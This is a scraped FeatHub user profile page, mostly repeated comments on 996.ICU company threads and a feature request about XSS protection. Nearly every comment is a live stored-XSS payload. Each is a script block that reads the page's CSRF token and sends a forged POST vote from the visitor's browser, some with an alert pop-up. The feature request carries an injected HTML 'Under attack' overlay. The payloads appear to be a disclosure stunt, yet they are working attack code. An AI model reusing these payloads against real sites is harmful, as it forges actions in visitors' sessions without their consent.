reinit

View on GitHub

Projects

This user doesn't have any project on FeatHub yet.

Features suggested

Project Feature Score Description
feathub/feathub Better protection against XSS attack 4 This system can be abused to inject HTML codes, some of which is dangerous thus must be prevented. The actual exploitation can be found here: https://feathub.com/xss67612 <table style="left: 0px; bottom: 0px; position: fixed;z-index: 5000;width:100%;background-color: rgba(255, 0, 0, 0.5);"><tbody><tr><td style="color:#FFFFFF;z-index: 6000;vertical-align:top;"><center><h1>Under attack</h1></center></td></tr></tbody></table>

Comments

Project Feature Comment When
feathub/feathub YOUR SITE EXISTS XSS <script> var xmlReq = new XMLHttpRequest(); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU 阿里 Please report XSS vulnerability https://feathub.com/feathub/feathub/+65 <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU 有赞 Please report XSS vulnerability <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU 京东(假装置顶:投票正常能用。查看评论请禁用JavaScript) Please report XSS vulnerability <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU 完美世界 经常加班到三四点 无加班费(DOTA2服务器总崩... 你们加班咋加的....) <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Content-Length", "129"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU 完美世界 经常加班到三四点 无加班费(DOTA2服务器总崩... 你们加班咋加的....) <script> var xmlReq = new XMLHttpRequest(); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU 并夕夕 <script> var xmlReq = new XMLHttpRequest(); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU 并夕夕 <script> var xmlReq = new XMLHttpRequest(); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU 并夕夕 <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send(); </script> 6 months ago
LinXueyuanStdio/996.ICU 阿里 Please report XSS vulnerability <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send(); </script> 6 months ago
LinXueyuanStdio/996.ICU 有赞 Please report XSS vulnerability <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send(); </script> 6 months ago
LinXueyuanStdio/996.ICU 京东(假装置顶:投票正常能用。查看评论请禁用JavaScript) Please report XSS vulnerability <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send(); </script> 6 months ago

Votes

Vote When Project Feature
6 months ago feathub/feathub Better protection against XSS attack